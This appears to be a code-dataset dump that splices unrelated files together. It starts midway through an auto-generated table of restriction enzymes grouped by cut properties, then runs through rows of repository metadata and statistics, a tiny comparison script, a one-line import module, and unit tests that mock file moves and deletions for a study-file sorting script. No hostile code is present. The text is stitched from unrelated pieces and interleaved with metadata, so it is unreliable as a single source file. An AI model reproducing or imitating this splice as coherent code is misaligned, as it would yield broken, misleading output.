['SpoDI', 'OspHL35III', 'Xca85IV', 'Pba2294I', 'Kpn156V', 'Pcr308II', 'Cgl13032I', 'RspPBTS2III', 'Rmu369III', 'Pal408I', 'EsaSSI', 'Pse18267I', 'HpyUM032XIV', 'PpiP13II', 'BbuB31I', 'Hpy99XIV_mut1', 'Sba460II', 'AbaB8342IV', 'Eco4465II', 'Cdu23823II', 'RflFIII', 'CcrNAIII', 'Pdi8503III', 'MspI7IV', 'Bga514I', 'Bau1417V', 'Nbr128II', 'Cgl13032II', 'Lra68I', 'Adh6U21I', 'Kpn327I', 'Mlu211III', 'Pst273I', 'CjeFV', 'Bbr7017II', 'Fco1691IV', 'Asp103I', 'SenSARA26III', 'HdeNY26I', 'Lsp48III', 'EcoMVII', 'Bbr57III', 'BscGI', 'Bsp3004IV', 'DvuIII', 'SenA1673III', 'SpnRII', 'PliMI', 'EcoE1140I', 'SurP32aII', 'Ble402II', 'Ecl35734I', 'Sbo46I', 'Pac19842II', 'BbuB31II', 'HdeZA17I', 'Sno506I', 'Hpy99XIV', 'Bbr7017III', 'Aco12261II', 'AspJHL3II', 'Asp114pII', 'FspPK15I', 'SthSt3II', 'KpnNIH50I', 'Sth20745III', 'Cco14983VI', 'CfrMH16VI', 'Cdi11397I', 'Mba11I', 'EcoNIH6II', 'RdeGBI', 'Jma19592II', 'Vtu19109I', 'CjeFIII', 'FtnUV', 'Ssp714II', 'AhyYL17I', 'PinP23II', 'PflPt14I', 'Hpy300XI', 'AspNIH4III', 'Hpy99XXII', 'ObaBS10I', 'DrdII', 'Eco43896II', 'Cch467III', 'Lba2029III', 'TpyTP2I', 'Cje265V', 'MspSC27II', 'HpyAXVI_mut2', 'Bbr52II', 'AchA6III', 'BanLI', 'HbaII', 'SmaUMH5I', 'NhaXI', 'CjeNV', 'Lpl1004II', 'RpaTI', 'Vdi96II', 'BkrAM31DI', 'BspNCI', 'Cau10061II', 'PinP59III', 'PacIII', 'Cal14237I', 'Rsp531II', 'Esp3007I', 'BloAII', 'CfrMH13II', 'Cfupf3II', 'Csp2014I', 'Lde4408II', 'Ssp6803IV', 'Cba16038I', 'PfrJS12V', 'SenTFIV', 'GauT27I', 'Pdu1735I', 'HpyAXIV', 'LlaG50I', 'KpnNIH30III', 'Cba13II', 'Psp0357II', 'MtuHN878II', 'Lmo911II', 'Pst145I', 'Lsp6406VI', 'Gba708II', 'MkaDII', 'PfrJS12IV', 'Jma19592I', 'Eli8509II', 'VchE4II', 'Awo1030IV', 'Saf8902III', 'Sen17963III', 'EcoHSI', 'Nal45188II', 'BfaSII', 'Cbo67071IV', 'Mcr10I', 'Aod1I', 'Cla11845III', 'AhyRBAHI', 'MspI7II', 'Rtr1953I', 'Bve1B23I', 'Rsp008IV', 'HpyAXVI_mut1', 'Rba2021I', 'KpnNH25III', 'Lmo370I', 'ScoDS2II', 'Cco14983V', 'AbaCIII', 'CjeNII', 'AteTI', 'Aba6411II', 'SmaUMH8I', 'Sag901I', 'Rsp008V', 'AspSLV7III', 
'HpyUM037X', 'OgrI', 'AspDUT2V', 'PfrJS15III', 'Jsp2502II', 'Pst14472I', 'LsaDS4I', 'Ecl234I', 'NpeUS61II', 'Acc65V', 'Bsp460III', 'Cje54107III', 'Cma23826I', 'Hpy99XIII', 'TspARh3I', 'AcoY31II', 'Cly7489II', 'CalB3II', 'Bag18758I', 'Kor51II', 'Van9116I', 'Asu14238IV', 'Pin17FIII', 'HpyUM032XIII_mut1', 'PcaII', 'Bce3081I'],
)
typedict['type146'] = _temp()
def _temp():
return (
('NonPalindromic', 'NoCut', 'Unknown', 'NotDefined', 'Meth_Undep', 'Not_available', 'AbstractCut', 'RestrictionType'),
['UbaF14I', 'CjeP659IV', 'PsuGI', 'CjuII', 'AlwFI', 'BspGI', 'Pfl1108I', 'UbaF13I', 'AbaUMB2I', 'RlaI', 'PenI', 'UbaF12I', 'TsuI', 'UbaF9I', 'FinI', 'UbaF11I', 'UbaPI', 'BmgI'],
)
typedict['type148'] = _temp()
def _temp():
return (
('Palindromic', 'NoCut', 'Unknown', 'NotDefined', 'Meth_Dep', 'Not_available', 'AbstractCut', 'RestrictionType'),
['MjaIV', 'HpyUM032XIII'],
)
typedict['type2'] = _temp()
def _temp():
return (
('NonPalindromic', 'OneCut', 'Blunt', 'Defined', 'Meth_Dep', 'Commercially_available', 'AbstractCut', 'RestrictionType'),
['MlyI', 'BsrBI'],
)
typedict['type209'] = _temp()
def _temp():
return (
('NonPalindromic', 'OneCut', 'Blunt', 'Defined', 'Meth_Dep', 'Not_available', 'AbstractCut', 'RestrictionType'),
['NgoAVII'],
)
typedict['type210'] = _temp()
def _temp():
return (
('NonPalindromic', 'OneCut', 'Blunt', 'Defined', 'Meth_Undep', 'Commercially_available', 'AbstractCut', 'RestrictionType'),
['BmgBI', 'SchI', 'BtrI', 'AjiI', 'AccBSI', 'MbiI'],
)
typedict['type211'] = _temp()
def _temp():
return (
('NonPalindromic', 'OneCut', 'Blunt', 'Defined', 'Meth_Undep', 'Not_available', 'AbstractCut', 'RestrictionType'),
['CdiI', 'SspD5I'],
)
typedict['type212'] = _temp()
def _temp():
return (
('NonPalindromic', 'OneCut', 'Ov5', 'Defined', 'Meth_Dep', 'Commercially_available', 'AbstractCut', 'RestrictionType'),
['AciI', 'BspACI', 'BssSI', 'BbvCI'],
)
typedict['type221'] = _temp()
def _temp():
return (
('NonPalindromic', 'OneCut', 'Ov5', 'Defined', 'Meth_Undep', 'Commercially_available', 'AbstractCut', 'RestrictionType'),
['SsiI', 'Bst2BI', 'PspFI', 'BseYI', 'BauI'],
)
typedict['type223'] = _temp()
def _temp():
return (
('NonPalindromic', 'OneCut', 'Ov5', 'Defined', 'Meth_Undep', 'Not_available', 'AbstractCut', 'RestrictionType'),
['SimI', 'GdiII', 'BsiI'],
)
typedict['type224'] = _temp()
def _temp():
return (
('NonPalindromic', 'OneCut', 'Ov5', 'Ambiguous', 'Meth_Dep', 'Commercially_available', 'AbstractCut', 'RestrictionType'),
['AlwI', 'BsaI', 'Esp3I', 'Bpu10I', 'Lsp1109I', 'BfuAI', 'BbvI', 'HgaI', 'BspMI', 'PleI', 'BccI', 'BcoDI', 'FokI', 'Alw26I', 'Eco31I', 'BceAI', 'BsmAI', 'SapI', 'BsmFI', 'BsmBI', 'BtgZI', 'EarI'],
)
typedict['type225'] = _temp()
def _temp():
return (
('NonPalindromic', 'OneCut', 'Ov5', 'Ambiguous', 'Meth_Dep', 'Not_available', 'AbstractCut', 'RestrictionType'),
['StsI', 'BscAI'],
)
typedict['type226'] = _temp()
def _temp():
return (
('NonPalindromic', 'OneCut', 'Ov5', 'Ambiguous', 'Meth_Undep', 'Commercially_available', 'AbstractCut', 'RestrictionType'),
['BspTNI', 'LweI', 'PciSI', 'CseI', 'AclWI', 'BseXI', 'BstV2I', 'AarI', 'LguI', 'BmsI', 'BspQI', 'MspJI', 'BstV1I', 'Bso31I', 'FaqI', 'FspEI', 'BveI', 'PpsI', 'Eam1104I', 'Acc36I', 'BspPI', 'BslFI', 'FauI', 'Bst6I', 'BpiI', 'LpnPI', 'BstMAI', 'BbsI', 'SfaNI'],
)
typedict['type227'] = _temp()
def _temp():
return (
('NonPalindromic', 'OneCut', 'Ov5', 'Ambiguous', 'Meth_Undep', 'Not_available', 'AbstractCut', 'RestrictionType'),
['SgrTI', 'Sth132I', 'EcoBLMcrX', 'BbvII', 'BinI', 'AspBHI', 'BspD6I', 'BcefI', 'AceIII', 'Ksp632I'],
)
typedict['type228'] = _temp()
def _temp():
return (
('NonPalindromic', 'OneCut', 'Ov3', 'Defined', 'Meth_Undep', 'Commercially_available', 'AbstractCut', 'RestrictionType'),
['GsaI'],
)
typedict['type235'] = _temp()
def _temp():
return (
('NonPalindromic', 'OneCut', 'Ov3', 'Ambiguous', 'Meth_Dep', 'Commercially_available', 'AbstractCut', 'RestrictionType'),
['BstF5I', 'BpuEI', 'BsrI', 'MboII', 'TaqII', 'BspCNI', 'BsgI', 'TspGWI', 'BmrI', 'HpyAV', 'HphI', 'BseMII', 'MnlI', 'BseRI', 'MmeI', 'Eco57I', 'BpmI', 'AcuI', 'NmeAIII'],
)
typedict['type237'] = _temp()
def _temp():
return (
('NonPalindromic', 'OneCut', 'Ov3', 'Ambiguous', 'Meth_Dep', 'Not_available', 'AbstractCut', 'RestrictionType'),
['MaqI', 'RpaBI', 'DraRI', 'SdeAI', 'RceI', 'WviI', 'BfiI', 'CstMI', 'PspOMII', 'TaqIII', 'RlaII', 'DrdIV', 'CchII', 'AmaCSI', 'PlaDI', 'NmeA6CIII', 'TsoI', 'SstE37I', 'RpaB5I', 'CdpI', 'CchIII', 'CjeNIII', 'BsbI', 'NlaCI', 'AquII', 'AquIV', 'ApyPI', 'Tth111II', 'RpaI', 'PspPRI', 'AquIII', 'RdeGBII'],
)
typedict['type238'] = _temp()
def _temp():
return (
('NonPalindromic', 'OneCut', 'Ov3', 'Ambiguous', 'Meth_Undep', 'Commercially_available', 'AbstractCut', 'RestrictionType'),
['EciI', 'Mva1269I', 'Bse1I', 'LmnI', 'BtsIMutI', 'GsuI', 'BtsCI', 'BsuI', 'AsuHPI', 'AbaSI', 'BseGI', 'Bse3DI', 'BsrDI', 'BciVI', 'BtsI', 'BfuI', 'BsmI', 'BseMI', 'TspDTI', 'BmuI', 'PctI', 'BseNI'],
)
typedict['type239'] = _temp()
def _temp():
return (
('NonPalindromic', 'OneCut', 'Ov3', 'Ambiguous', 'Meth_Undep', 'Not_available', 'AbstractCut', 'RestrictionType'),
['BmeDI', 'Bce83I', 'Hin4II', 'Eco57MI', 'YkrI', 'RleAI'],
)
typedict['type240'] = _temp()
def _temp():
return (
('NonPalindromic', 'TwoCuts', 'Ov5', 'Ambiguous', 'Meth_Dep', 'Not_available', 'AbstractCut', 'RestrictionType'),
['BceSIV'],
)
typedict['type274'] = _temp()
def _temp():
return (
('NonPalindromic', 'TwoCuts', 'Ov3', 'Ambiguous', 'Meth_Dep', 'Commercially_available', 'AbstractCut', 'RestrictionType'),
['CspCI', 'AloI', 'BcgI'],
)
typedict['type285'] = _temp()
def _temp():
return (
('NonPalindromic', 'TwoCuts', 'Ov3', 'Ambiguous', 'Meth_Dep', 'Not_available', 'AbstractCut', 'RestrictionType'),
['TstI', 'NgoAVIII', 'PpiI', 'SdeOSI', 'CjeI'],
)
typedict['type286'] = _temp()
def _temp():
return (
('NonPalindromic', 'TwoCuts', 'Ov3', 'Ambiguous', 'Meth_Undep', 'Commercially_available', 'AbstractCut', 'RestrictionType'),
['PsrI', 'AjuI', 'BaeI', 'ArsI', 'BarI', 'BsaXI'],
)
typedict['type287'] = _temp()
def _temp():
return (
('NonPalindromic', 'TwoCuts', 'Ov3', 'Ambiguous', 'Meth_Undep', 'Not_available', 'AbstractCut', 'RestrictionType'),
['CjePI', 'Bsp24I', 'Hin4I'],
)
typedict['type288'] = _temp()
def _temp():
return (
('Palindromic', 'NoCut', 'Unknown', 'NotDefined', 'Meth_Undep', 'Not_available', 'AbstractCut', 'RestrictionType'),
['NhoI', 'CjuI', 'AvaIII', 'TssI', 'Dde51507I', 'SnaI', 'HgiEII'],
)
typedict['type4'] = _temp()
def _temp():
return (
('Palindromic', 'OneCut', 'Blunt', 'Defined', 'Meth_Dep', 'Commercially_available', 'AbstractCut', 'RestrictionType'),
['ScaI', 'SnaBI', 'CviJI', 'XmnI', 'DraI', 'AluBI', 'PshAI', 'SwaI', 'NaeI', 'NruI', 'SfoI', 'RsaI', 'HincII', 'BstC8I', 'PmlI', 'AluI', 'Hpy8I', 'SmaI', 'FspI', 'PvuII', 'BsuRI', 'MspA1I', 'EcoRV', 'BstUI', 'HaeIII', 'SspI', 'BalI', 'NlaIV', 'HpaI', 'Cac8I', 'HindII', 'AleI', 'BsaAI'],
)
typedict['type65'] = _temp()
def _temp():
return (
('Palindromic', 'OneCut', 'Blunt', 'Defined', 'Meth_Dep', 'Not_available', 'AbstractCut', 'RestrictionType'),
['FnuDII', 'EsaBC3I', 'CviRI'],
)
typedict['type66'] = _temp()
def _temp():
return (
('Palindromic', 'OneCut', 'Blunt', 'Defined', 'Meth_Undep', 'Commercially_available', 'AbstractCut', 'RestrictionType'),
['PspN4I', 'MslI', 'Bsp68I', 'PmaCI', 'BsaBI', 'SmiI', 'BseJI', 'BshFI', 'BmcAI', 'Eco47III', 'Hpy166II', 'AcvI', 'RruI', 'EgeI', 'OliI', 'DpnI', 'Bst1107I', 'BbrPI', 'BstSNI', 'RseI', 'MlsI', 'AccII', 'BtuMI', 'Aor51HI', 'Bsh1236I', 'MalI', 'MssI', 'BsnI', 'FspAI', 'BmiI', 'BoxI', 'BssNAI', 'BspANI', 'GlaI', 'MvnI', 'ZraI', 'Eco72I', 'MscI', 'SseBI', 'SmiMI', 'Ppu21I', 'StuI', 'Eco53kI', 'EheI', 'BstPAI', 'PsiI', 'Ecl136II', 'Acc16I', 'MluNI', 'MroXI', 'ZrmI', 'DinI', 'BstFNI', 'BspLI', 'Eco105I', 'NsbI', 'Bse8I', 'BspFNI', 'BstZ17I', 'Msp20I', 'AfeI', 'SrfI', 'Eco32I', 'KspAI', 'AanI', 'PmeI', 'Mox20I', 'FaiI', 'Eco147I', 'CviKI_1', 'PdmI', 'HpyCH4V', 'PceI', 'BstBAI', 'AfaI', 'Asp700I', 'EcoICRI', 'PspCI', 'PdiI'],
)
typedict['type67'] = _temp()
def _temp():
return (
('Palindromic', 'OneCut', 'Blunt', 'Defined', 'Meth_Undep', 'Not_available', 'AbstractCut', 'RestrictionType'),
['Pfl8569I', 'HaeI', 'NspBII', 'SciI', 'LpnI', 'AhaIII', 'Sth302II', 'MstI'],
)
typedict['type68'] = _temp()
def _temp():
return (
('Palindromic', 'OneCut', 'Ov5', 'Defined', 'Meth_Dep', 'Commercially_available', 'AbstractCut', 'RestrictionType'),
['BssHII', 'BsrFI', 'DpnII', 'MluI', 'NgoMIV', 'HpaII', 'TspMI', 'BclI', 'BsaWI', 'SalI', 'MspI', 'Bsu15I', 'NcoI', 'ClaI', 'AgeI', 'XmaI', 'Cfr9I', 'TaqI', 'EaeI', 'AseI', 'AclI', 'ApoI', 'HpyCH4IV', 'NdeI', 'HapII', 'AflII', 'BglII', 'Acc65I', 'MseI', 'BsaHI', 'XbaI', 'MboI', 'CviQI', 'NheI', 'Sau3AI', 'BsiWI', 'CviAII', 'MfeI', 'ApaLI', 'Cfr10I', 'HinP1I', 'HspAI', 'HindIII', 'EcoRI', 'XhoI', 'BseCI', 'AccIII', 'MunI', 'EagI', 'AscI', 'VspI', 'KasI', 'Kpn2I', 'SgrAI', 'BspHI', 'BstYI', 'Sse9I', 'NotI', 'FatI', 'BamHI', 'PaeR7I'],
)
typedict['type77'] = _temp()
def _temp():
return (
('Palindromic', 'OneCut', 'Ov5', 'Defined', 'Meth_Dep', 'Not_available', 'AbstractCut', 'RestrictionType'),
['XmaIII', 'CfrI', 'XhoII'],
)
typedict['type78'] = _temp()
def _temp():
return (
('Palindromic', 'OneCut', 'Ov5', 'Defined', 'Meth_Undep', 'Commercially_available', 'AbstractCut', 'RestrictionType'),
['BssMI', 'AsuNHI', 'PshBI', 'BshTI', 'CciI', 'MreI', 'AhlI', 'XspI', 'KroI', 'BfaI', 'PauI', 'Asp718I', 'VneI', 'PspXI', 'AsiGI', 'CciNI', 'Sfr274I', 'PteI', 'Ksp22I', 'Bsp19I', 'MauBI', 'AbsI', 'AsuII', 'FauNDI', 'Vha464I', 'BstACI', 'AcoI', 'BstMBI', 'BssAI', 'BseAI', 'Hin6I', 'PalAI', 'BstAUI', 'Bpu14I', 'Eco52I', 'BspT104I', 'SspDI', 'TasI', 'AcsI', 'BseX3I', 'FspBI', 'RsaNI', 'AvrII', 'MaeI', 'XapI', 'PscI', 'Bsp1407I', 'SspMI', 'PciI', 'Bse118I', 'NarI', 'BsePI', 'MaeII', 'Bsp13I', 'BsiSI', 'Bsp119I', 'BstX2I', 'SlaI', 'SgsI', 'MluCI', 'PsuI', 'AspA2I', 'BcuI', 'BspTI', 'SpeI', 'Mly113I', 'MflI', 'BshVI', 'Hin1I', 'SgrDI', 'MroNI', 'XmaJI', 'MspCI', 'Psp1406I', 'Kzo9I', 'Csp6I', 'Bsp143I', 'Bsa29I', 'Tru1I', 'Aor13HI', 'PinAI', 'EclXI', 'BspEI', 'BstZI', 'Alw44I', 'Hsp92I', 'BlnI', 'NdeII', 'BsrGI', 'CspAI', 'FbaI', 'PspOMI', 'SaqAI', 'SfuI', 'NspV', 'BfrI', 'BstBI', 'BssNI', 'HpySE526I', 'Tru9I', 'Bsp120I', 'MroI', 'AoxI', 'AcyI', 'BsuTUI', 'BspDI', 'BstAFI', 'TatI', 'Pfl23II', 'PspLI', 'PagI'],
)
typedict['type79'] = _temp()
def _temp():
return (
('Palindromic', 'OneCut', 'Ov5', 'Defined', 'Meth_Undep', 'Not_available', 'AbstractCut', 'RestrictionType'),
['SelI', 'BspLU11I', 'SplI', 'TspEI', 'Asi256I', 'Ppu10I', 'Sse232I', 'BetI', 'BspMII'],
)
typedict['type80'] = _temp()
# Auto-generated REBASE typedict entries.  Each value is a pair:
#   (tuple of RestrictionType property/base-class names,
#    list of enzyme names sharing exactly those properties).
# Earlier entries in this table build each pair through a throwaway
# _temp() factory; the identical pairs are assigned directly here.
typedict['type81'] = (
    ('Palindromic', 'OneCut', 'Ov5', 'Ambiguous', 'Meth_Dep', 'Commercially_available', 'AbstractCut', 'RestrictionType'),
    ['PspPI', 'AspS9I', 'StyD4I', 'PspGI', 'PpuMI', 'BsoBI', 'BlpI', 'BssECI', 'AjnI', 'AvaI', 'SexAI', 'SinI', 'Sau96I', 'BstNI', 'Cfr13I', 'TseI', 'SmlI', 'MvaI', 'Bsu36I', 'AflIII', 'TfiI', 'BanI', 'RsrII', 'BcnI', 'ScrFI', 'EcoRII', 'EcoNI', 'ApeKI', 'HinfI', 'NciI', 'Fsp4HI', 'EcoO109I', 'Tth111I', 'AccI', 'DdeI', 'AvaII', 'BsaJI', 'Fnu4HI', 'Tsp45I', 'StyI'],
)
typedict['type82'] = (
    ('Palindromic', 'OneCut', 'Ov5', 'Ambiguous', 'Meth_Dep', 'Not_available', 'AbstractCut', 'RestrictionType'),
    ['HgiCI', 'EcoHI'],
)
typedict['type83'] = (
    ('Palindromic', 'OneCut', 'Ov5', 'Ambiguous', 'Meth_Undep', 'Commercially_available', 'AbstractCut', 'RestrictionType'),
    ['AxyI', 'BspT107I', 'PspEI', 'BisI', 'BstPI', 'BstSFI', 'BstEII', 'BmgT120I', 'BssT1I', 'PsyI', 'BtgI', 'Eco91I', 'Bst2UI', 'BstDEI', 'GluI', 'BstENI', 'Ama87I', 'BstDSI', 'PflFI', 'Bme1390I', 'Psp5II', 'EcoO65I', 'BmrFI', 'EcoT14I', 'PspPPI', 'BseBI', 'PfoI', 'BshNI', 'Rsr2I', 'BmeT110I', 'PasI', 'TseFI', 'CpoI', 'Eco130I', 'CspI', 'BfmI', 'Eco47I', 'Bme18I', 'MabI', 'Hpy188III', 'Bse21I', 'BstSCI', 'BpuMI', 'SgeI', 'XagI', 'SmoI', 'Bsp1720I', 'MaeIII', 'ErhI', 'AsuC2I', 'BsiHKCI', 'MspR9I', 'XmiI', 'VpaK11BI', 'PfeI', 'Bpu1102I', 'SfcI', 'SatI', 'BciT130I', 'KflI', 'BseDI', 'Eco81I', 'Eco88I', 'FblI', 'AccB1I', 'CsiI', 'MteI', 'Psp6I', 'HpyF3I', 'NmuCI'],
)
typedict['type84'] = (
    ('Palindromic', 'OneCut', 'Ov5', 'Ambiguous', 'Meth_Undep', 'Not_available', 'AbstractCut', 'RestrictionType'),
    ['SanDI', 'DsaI', 'SauI', 'DraII', 'UnbI', 'VpaK11AI', 'Hpy178III', 'SfeI', 'CauII', 'AsuI', 'SecI', 'EspI', 'Sse8647I'],
)
typedict['type89'] = (
    ('Palindromic', 'OneCut', 'Ov3', 'Defined', 'Meth_Dep', 'Commercially_available', 'AbstractCut', 'RestrictionType'),
    ['SacI', 'KpnI', 'HaeII', 'SacII', 'AatII', 'PluTI', 'NlaIII', 'PstI', 'Cfr42I', 'FseI', 'ApaI', 'NspI', 'HhaI', 'AsiSI'],
)
typedict['type90'] = (
    ('Palindromic', 'OneCut', 'Ov3', 'Defined', 'Meth_Dep', 'Not_available', 'AbstractCut', 'RestrictionType'),
    ['PabI', 'McaTI'],
)
typedict['type91'] = (
    ('Palindromic', 'OneCut', 'Ov3', 'Defined', 'Meth_Undep', 'Commercially_available', 'AbstractCut', 'RestrictionType'),
    ['SgrBI', 'BstHHI', 'BstH2I', 'BmtI', 'Mph1103I', 'PvuI', 'BspOI', 'AspLEI', 'Zsp2I', 'PacI', 'FaeI', 'SdaI', 'BstNSI', 'Ple19I', 'Hin1II', 'Sse8387I', 'PaeI', 'TaiI', 'Hsp92II', 'Psp124BI', 'Sfr303I', 'CfoI', 'BstKTI', 'SstI', 'SphI', 'SfaAI', 'RgaI', 'SgfI', 'SbfI', 'BspMAI', 'XceI', 'NsiI', 'EcoT22I', 'KspI', 'BfoI', 'RigI'],
)
typedict['type92'] = (
    ('Palindromic', 'OneCut', 'Ov3', 'Defined', 'Meth_Undep', 'Not_available', 'AbstractCut', 'RestrictionType'),
    ['ChaI', 'MspGI'],
)
typedict['type93'] = (
    ('Palindromic', 'OneCut', 'Ov3', 'Ambiguous', 'Meth_Dep', 'Commercially_available', 'AbstractCut', 'RestrictionType'),
    ['AgsI', 'MwoI', 'EcoT38I', 'BglI', 'BanII', 'Hpy99I', 'BstXI', 'BaeGI', 'Hpy188I', 'Bsc4I', 'TspRI', 'DraIII', 'Bsp1286I', 'AhdI', 'SfiI', 'XcmI', 'BstAPI', 'BslI'],
)
typedict['type94'] = (
    ('Palindromic', 'OneCut', 'Ov3', 'Ambiguous', 'Meth_Dep', 'Not_available', 'AbstractCut', 'RestrictionType'),
    ['BthCI', 'HauII'],
)
typedict['type95'] = (
    ('Palindromic', 'OneCut', 'Ov3', 'Ambiguous', 'Meth_Undep', 'Commercially_available', 'AbstractCut', 'RestrictionType'),
    ['AlwNI', 'DrdI', 'TscAI', 'Eco24I', 'BsiHKAI', 'BseSI', 'Van91I', 'DseDI', 'SetI', 'BmeRI', 'TaaI', 'BstMCI', 'HpyF10VI', 'Bst4CI', 'SduI', 'Alw21I', 'AccB7I', 'AdeI', 'BsiEI', 'BseLI', 'FriOI', 'AasI', 'Eam1105I', 'TauI', 'AfiI', 'CaiI', 'Bbv12I', 'HpyCH4III', 'BstSLI', 'BlsI', 'PcsI', 'BstMWI', 'PstNI', 'PkrI', 'MhlI', 'DriI', 'Bsh1285I', 'PflMI'],
)
typedict['type96'] = (
    ('Palindromic', 'OneCut', 'Ov3', 'Ambiguous', 'Meth_Undep', 'Not_available', 'AbstractCut', 'RestrictionType'),
    ['Nli3877I', 'Psp03I', 'BsiYI', 'ApaBI', 'Tsp4CI', 'FmuI', 'McrI', 'HgiJII', 'PssI', 'HgiAI'],
)
# Drop the factory helper left over from the earlier generated entries.
del _temp
| 21.769057 | 2,331 | 0.411553 | 54,567 | 538,893 | 3.964337 | 0.038613 | 0.050813 | 0.061778 | 0.080551 | 0.814143 | 0.80554 | 0.797214 | 0.755018 | 0.731964 | 0.654261 | 0 | 0.062543 | 0.357854 | 538,893 | 24,754 | 2,332 | 21.769936 | 0.562578 | 0.001329 | 0 | 0.807149 | 0 | 0.004996 | 0.306574 | 0.057405 | 0 | 0 | 0 | 0 | 0 | 1 | 0.049862 | false | 0 | 0 | 0.049862 | 0.099724 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
d4e9b8d820f7cbdd6bee6916235ae29d6bcb299b | 49 | py | Python | tests/src/trivia/procGT.py | lindlind/python-interpreter | ffcb38627dc128dddb04e769d0bff6466365271a | [
"MIT"
] | null | null | null | tests/src/trivia/procGT.py | lindlind/python-interpreter | ffcb38627dc128dddb04e769d0bff6466365271a | [
"MIT"
] | null | null | null | tests/src/trivia/procGT.py | lindlind/python-interpreter | ffcb38627dc128dddb04e769d0bff6466365271a | [
"MIT"
] | null | null | null | "abc" > "abc"
42 > 42
13.37 > 13.37
True > False
| 9.8 | 13 | 0.55102 | 10 | 49 | 2.7 | 0.6 | 0.296296 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.324324 | 0.244898 | 49 | 4 | 14 | 12.25 | 0.405405 | 0 | 0 | 0 | 0 | 0 | 0.122449 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
be1472463b482ccc2507dc89bb7a79b789c07ab2 | 95 | py | Python | locate/__init__.py | heetbeet/locate | cc36fb10937847a97e421c3c6767876821fb9a7d | [
"MIT"
] | 2 | 2021-01-11T15:04:25.000Z | 2021-07-15T08:03:48.000Z | locate/__init__.py | heetbeet/locate | cc36fb10937847a97e421c3c6767876821fb9a7d | [
"MIT"
] | null | null | null | locate/__init__.py | heetbeet/locate | cc36fb10937847a97e421c3c6767876821fb9a7d | [
"MIT"
] | null | null | null | from .locate import this_dir, allow_relative_location_imports, force_relative_location_imports
| 47.5 | 94 | 0.905263 | 13 | 95 | 6.076923 | 0.769231 | 0.405063 | 0.582278 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.063158 | 95 | 1 | 95 | 95 | 0.88764 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
0778df7f82fb56caf016a1f31b53683d64857d4a | 2,443 | py | Python | scripts/tests/test_files_to_import_structure.py | gaybro8777/osf.io | 30408511510a40bc393565817b343ef5fd76ab14 | [
"Apache-2.0"
] | 628 | 2015-01-15T04:33:22.000Z | 2022-03-30T06:40:10.000Z | scripts/tests/test_files_to_import_structure.py | gaybro8777/osf.io | 30408511510a40bc393565817b343ef5fd76ab14 | [
"Apache-2.0"
] | 4,712 | 2015-01-02T01:41:53.000Z | 2022-03-30T14:18:40.000Z | scripts/tests/test_files_to_import_structure.py | Johnetordoff/osf.io | de10bf249c46cede04c78f7e6f7e352c69e6e6b5 | [
"Apache-2.0"
] | 371 | 2015-01-12T16:14:08.000Z | 2022-03-31T18:58:29.000Z | # -*- coding: utf-8 -*-
import mock
from tests.base import OsfTestCase
from scripts.EGAP.files_to_import_structure import action_files_by_name
class TestEGAPFilesToImportStructure(OsfTestCase):
    """Tests for scripts.EGAP.files_to_import_structure.action_files_by_name,
    verifying which filesystem calls it makes for each kind of file name."""

    @mock.patch('scripts.EGAP.files_to_import_structure.os.mkdir')
    @mock.patch('scripts.EGAP.files_to_import_structure.shutil.move')
    def test_doesnt_move_nonanon_files(self, mock_move, mock_mkdir):
        """A *_PAP.pdf (non-anonymous) file triggers neither mkdir nor move."""
        action_files_by_name(
            'scripts/tests/test_files/20151016AA/data/datatest_nonanonymous',
            'scripts/tests/test_files/20151016AA/data/test_nonanonymous/20151016AA_PAP.pdf',
            '20151016AA_PAP.pdf',
        )
        mock_mkdir.assert_not_called()
        mock_move.assert_not_called()

    @mock.patch('scripts.EGAP.files_to_import_structure.os.mkdir')
    @mock.patch('scripts.EGAP.files_to_import_structure.shutil.move')
    def test_moves_anon_files(self, mock_move, mock_mkdir):
        """A *_anonymous.pdf file causes an anonymous/ dir to be created and
        the file to be moved into it."""
        source = 'scripts/tests/test_files/20151016AA/data/test_nonanonymous/20151016AA_anonymous.pdf'
        action_files_by_name(
            'scripts/tests/test_files/20151016AA/data/test_nonanonymous',
            source,
            '20151016AA_anonymous.pdf',
        )
        mock_mkdir.assert_called_with('scripts/tests/test_files/20151016AA/data/anonymous')
        mock_move.assert_called_with(
            source,
            'scripts/tests/test_files/20151016AA/data/anonymous/20151016AA_anonymous.pdf',
        )

    @mock.patch('scripts.EGAP.files_to_import_structure.os.remove')
    def test_removes_no_id(self, mock_remove):
        """A file whose name carries no submission id is removed."""
        target = 'scripts/tests/test_files/20151016AA/data/test_nonanonymous/justafile.pdf'
        action_files_by_name(
            'scripts/tests/test_files/20151016AA/data/test_nonanonymous',
            target,
            'justafile.pdf',
        )
        mock_remove.assert_called_with(target)

    @mock.patch('scripts.EGAP.files_to_import_structure.os.remove')
    def test_removes_form(self, mock_remove):
        """A *_FORM.pdf file is removed."""
        target = 'scripts/tests/test_files/20151016AA/data/test_nonanonymous/20151016AA_FORM.pdf'
        action_files_by_name(
            'scripts/tests/test_files/20151016AA/data/test_nonanonymous',
            target,
            '20151016AA_FORM.pdf',
        )
        mock_remove.assert_called_with(target)
